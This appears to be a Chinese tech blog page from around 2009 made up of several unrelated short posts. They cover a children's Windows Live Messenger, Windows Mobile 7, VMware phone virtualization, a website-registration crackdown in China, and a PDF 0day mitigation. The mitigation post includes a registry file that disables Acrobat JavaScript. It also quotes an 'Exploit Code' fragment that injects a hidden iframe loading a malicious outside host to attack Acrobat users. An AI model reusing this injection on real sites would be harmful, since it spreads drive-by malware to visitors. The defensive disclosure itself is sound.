微软为儿童(8-12 岁)开发专门的 Windows Live Messenger,挺好玩的。
根据 Heise Online 的解释:家长需要为自己的孩子建立 Windows Live ID 帐号,添加联系人也需要通过家长的验证。若有人骚扰,也可点击紧急电话按钮告诉家长。看来这就是和 Windows Live Family Safety 同样策略的安全保护了。微软选择了通过程序隐藏了 IE 的地址栏、工具栏、状态栏等。其实,Live Mesh 也是能实现这样的效果的(可以在桌面环境运行的 Live Mesh 应用,还可以文件共享和视频聊天),不过现在还不是推 Live Mesh 应用的时候。不过,或许是 Live Mesh 应用还不适合儿童使用吧。

微软CEO Steve Balmer在本周二的一场分析师会议上,透露Windows Mobile 7将于2010年发布,并且说道Windows Mobile 7将会和桌面端的Windows 7联系的更加紧密。Balmer提到Windows Mobile 7将可能会和Windows 7采用同样的浏览器技术,甚至是操作系统内核。此外,Balmer希望Windows Mobile操作系统的全球份额能提升一些。
最后,Balmer否认了微软会推出自有品牌手机的传闻。Windows Mobile 7应该是目前最令人期待的智能手机操作系统之一,貌似会全面超越iPhone。
我个人还是很喜欢 Windows Mobile 系统的,嚯嚯~~
今日 VMware 在 VMworld Europe 2009 上展示出最新手机系统虚拟化的技术,他们在一只诺基亚N800上作了一次公开演示。
结果不难预料,VMware 出色地在一只手机上成功的完成了同时运行 Windows CE 和 Android 两种系统,并且两种系统还可相互访问,也完全支持底层硬件。这表示手机系统和硬件之间的阻碍将被彻底打通,任何手机都可以轻松运行不同的系统,以下是视频演示:
据熟悉情况的IDC业内人士透露,由于信产部及上级部门最近展开网站清理及备案专项行动,近期将会有大量网站被关停,一些中小IDC企业的机房、服务器等也将被关闭。
据透露,日前相关部门下发了《关于集中开展全量网站清理及备案专项行动的通知》。通知要求IDC企业将所有于2月24日16:00前尚未获得备案号的网站进行关闭处理,保证网站在获得备案号前一律不得擅自接入等。
柯雅通信的工作人员透露,这次备案检查将有将近超过10万的网站被关闭,目前已经有12家电信机房因为监管不力而关闭。
该人士表示,目前网站进行备案需要20天,如果备案信息有错误退回再修改的周期大约60天,而且目前工信部备案网站访问速度缓慢,造成各网站无法在24日16点之前提交网站备案信息,因此这次将有大批量的网站被关闭。
该人士称,“很多IDC企业也可能会遭遇致命的打击。根据我们的统计,柯雅通信大概需要关闭将近40%的客户网站,其中10%是等待备案的企业网站,其余的30%要么不再做站要么流向了国外空间。”
“如果客户流失40%,对于一家小的IDC企业来说非常严重”,万网一位市场人士向TechWeb分析称,“虽然这次备案非常严格,但大的IDC企业肯多没有什么影响,洗牌的基本都是中小IDC企业”。
上述柯雅通信人士表示,目前公司已经对很多客户进行了退款,公司也为后半年发展作出了详细的规划,并且可能会裁减2/3的员工以面对低迷的市场状况。
但他同时强调,柯雅通信并非个例。“目前来看,因为被关闭机房而宣布倒闭或者发布公告想被收购的公司大概有十余家”。
将下面代码保存为名为"disableAcrobatJS.reg"的文件,运行即可禁止 Adobe Acrobat Reader - 6.x, 7.x, 8.x and 9.x 执行JavaScript。这是防止 PDF 0day 挂马的临时解决方案。
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\9.0\JSPrefs]
"bConsoleOpen"=dword:00000000
"bEnableJS"=dword:00000000
"bEnableMenuItems"=dword:00000000
[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\8.0\JSPrefs]
"bConsoleOpen"=dword:00000000
"bEnableJS"=dword:00000000
"bEnableMenuItems"=dword:00000000
[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\7.0\JSPrefs]
"bConsoleOpen"=dword:00000000
"bEnableJS"=dword:00000000
"bEnableMenuItems"=dword:00000000
[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\6.0\JSPrefs]
"bConsoleOpen"=dword:00000000
"bEnableJS"=dword:00000000
"bEnableMenuItems"=dword:00000000
来自JavaScript的脚本攻击代码。Adobe Acrobat Reader - 6.x, 7.x, 8.x and 9.x 下通过测试,Exploit Code 如下:
var name = navigator.plugins[i].name;
if (name.indexOf(”Adobe Acrobat”) != -1) {
document.write(”<iframe src=’http://bannerads08.com/f-mix/acrobat.php?id=46′ width=1 height=1 frameborder=0></iframe>”);
setTimeout(’pdf2();’, 20000);
转载至 insecureweb.com